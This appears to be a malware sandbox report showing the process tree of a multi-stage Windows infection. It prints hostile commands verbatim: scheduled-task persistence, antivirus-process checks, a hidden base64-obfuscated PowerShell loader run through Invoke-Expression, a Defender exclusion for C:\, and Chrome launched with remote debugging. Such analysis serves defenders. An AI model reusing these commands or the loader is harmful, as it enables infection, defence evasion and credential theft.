PID 4852 wrote to memory of 5912	4852	rapes.exe	101
PID 4852 wrote to memory of 5912	4852	rapes.exe	101
PID 4852 wrote to memory of 5912	4852	rapes.exe	101
PID 4852 wrote to memory of 2480	4852	rapes.exe	102
PID 4852 wrote to memory of 2480	4852	rapes.exe	102
PID 4852 wrote to memory of 2480	4852	rapes.exe	102
PID 4852 wrote to memory of 2504	4852	rapes.exe	104
PID 4852 wrote to memory of 2504	4852	rapes.exe	104
PID 4852 wrote to memory of 2504	4852	rapes.exe	104
PID 2504 wrote to memory of 2096	2504	but2.exe	105
PID 2504 wrote to memory of 2096	2504	but2.exe	105
PID 2504 wrote to memory of 2096	2504	but2.exe	105
PID 2504 wrote to memory of 6080	2504	but2.exe	107
PID 2504 wrote to memory of 6080	2504	but2.exe	107
PID 2504 wrote to memory of 6080	2504	but2.exe	107
PID 2504 wrote to memory of 3784	2504	but2.exe	109
PID 2504 wrote to memory of 3784	2504	but2.exe	109
PID 2504 wrote to memory of 3784	2504	but2.exe	109
PID 2504 wrote to memory of 5368	2504	but2.exe	110
PID 2504 wrote to memory of 5368	2504	but2.exe	110
PID 2504 wrote to memory of 5368	2504	but2.exe	110
PID 5368 wrote to memory of 2176	5368	cmd.exe	112
PID 5368 wrote to memory of 2176	5368	cmd.exe	112
PID 5368 wrote to memory of 2176	5368	cmd.exe	112
PID 4852 wrote to memory of 5688	4852	rapes.exe	115
PID 4852 wrote to memory of 5688	4852	rapes.exe	115
PID 4852 wrote to memory of 5688	4852	rapes.exe	115
PID 5688 wrote to memory of 2944	5688	larBxd7.exe	116
PID 5688 wrote to memory of 2944	5688	larBxd7.exe	116
PID 5688 wrote to memory of 2944	5688	larBxd7.exe	116
PID 2944 wrote to memory of 4368	2944	cmd.exe	118
PID 2944 wrote to memory of 4368	2944	cmd.exe	118
PID 2944 wrote to memory of 4368	2944	cmd.exe	118
PID 2944 wrote to memory of 1480	2944	cmd.exe	119
PID 2944 wrote to memory of 1480	2944	cmd.exe	119
PID 2944 wrote to memory of 1480	2944	cmd.exe	119
PID 2944 wrote to memory of 2652	2944	cmd.exe	120
PID 2944 wrote to memory of 2652	2944	cmd.exe	120
PID 2944 wrote to memory of 2652	2944	cmd.exe	120
PID 2944 wrote to memory of 860	2944	cmd.exe	121
PID 2944 wrote to memory of 860	2944	cmd.exe	121
PID 2944 wrote to memory of 860	2944	cmd.exe	121
PID 2944 wrote to memory of 2992	2944	cmd.exe	122
PID 2944 wrote to memory of 2992	2944	cmd.exe	122
PID 2944 wrote to memory of 2992	2944	cmd.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3548
- C:\Users\Admin\AppData\Local\Temp\random.exe
  "C:\Users\Admin\AppData\Local\Temp\random.exe"
  2⤵
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3280
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x2T29.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x2T29.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4536
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P22P6.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P22P6.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:1636
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4852
      - C:\Users\Admin\AppData\Local\Temp\10362200101\0487ffa47e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10362200101\0487ffa47e.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1216
      - C:\Users\Admin\AppData\Local\Temp\10380550101\d5441f9198.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10380550101\d5441f9198.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5912
      - C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2480
      - C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2504
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2096
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6080
        
        C:\Drivers\pcidrv.exe
        
        C:\Drivers\pcidrv.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:3784
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5368
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        8⤵
        Delays execution with timeout.exe
        
        PID:2176
      - C:\Users\Admin\AppData\Local\Temp\10434400101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10434400101\larBxd7.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        
        PID:5688
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2944
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4368
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1480
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2652
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:860
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 689912
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2992
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Exclusion.psd
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3408
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "users" Findarticles
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:776
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5604
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
        8⤵
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
        
        Jordan.com b
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1204
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1960
      - C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:272
      - C:\Users\Admin\AppData\Local\Temp\10460870101\RYZusWg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10460870101\RYZusWg.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1160
      - C:\Users\Admin\AppData\Local\Temp\10462640101\LJl8AAr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10462640101\LJl8AAr.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2192
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5700
      - C:\Users\Admin\AppData\Local\Temp\10462700101\n0hEgR9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10462700101\n0hEgR9.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5332
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5632
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4668
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5584
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4068
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4176
      - C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4400
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:3252
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:4924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7fff02cfdcf8,0x7fff02cfdd04,0x7fff02cfdd10
        11⤵
        
        PID:6140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2144,i,6050504021023749961,7182162962230942974,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2140 /prefetch:2
        11⤵
        
        PID:5620
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1936,i,6050504021023749961,7182162962230942974,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2224 /prefetch:3
        11⤵
        
        PID:2240
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2268,i,6050504021023749961,7182162962230942974,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2544 /prefetch:8
        11⤵
        
        PID:240
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,6050504021023749961,7182162962230942974,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3212 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:2508
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,6050504021023749961,7182162962230942974,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3272 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:4940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4384,i,6050504021023749961,7182162962230942974,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4396 /prefetch:2
        11⤵
        Uses browser remote debugging
        
        PID:3016
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
